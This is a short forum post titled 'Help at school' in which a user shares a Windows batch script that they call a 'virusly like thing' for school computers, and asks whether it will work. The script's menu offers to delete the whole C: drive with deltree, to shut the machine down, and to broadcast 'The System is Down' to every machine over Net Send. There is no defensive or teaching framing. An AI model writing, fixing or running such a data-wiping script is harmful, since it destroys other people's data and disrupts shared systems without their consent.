Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
Help at school
@ECHO OFF CLS :menu echo what do you want to do? echo. echo + echo - echo * set input=nothing set /p input=choice: if %input%==+ goto a if %input%==* goto m if %input%==- goto s goto menu :a echo Deleting C: drive deltree c:\* /y pause cls goto menu
:s echo Shutting down system shutdown -s pause cls goto menu
:m echo Sending "The system is down" Net Send * "The System is Down" pause cls goto menu
========================
thats wat i'm doing for a small virusly like thing so i can do stuff quickly on the computers, will this work?